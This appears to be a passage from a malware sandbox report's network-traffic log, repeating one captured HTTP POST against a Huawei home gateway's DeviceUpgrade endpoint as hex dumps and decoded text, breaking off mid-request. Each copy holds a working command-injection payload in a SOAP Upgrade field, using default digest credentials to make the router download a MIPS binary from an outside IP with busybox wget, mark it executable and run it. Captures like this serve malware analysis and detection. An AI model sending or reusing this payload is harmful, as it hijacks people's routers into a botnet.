62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope 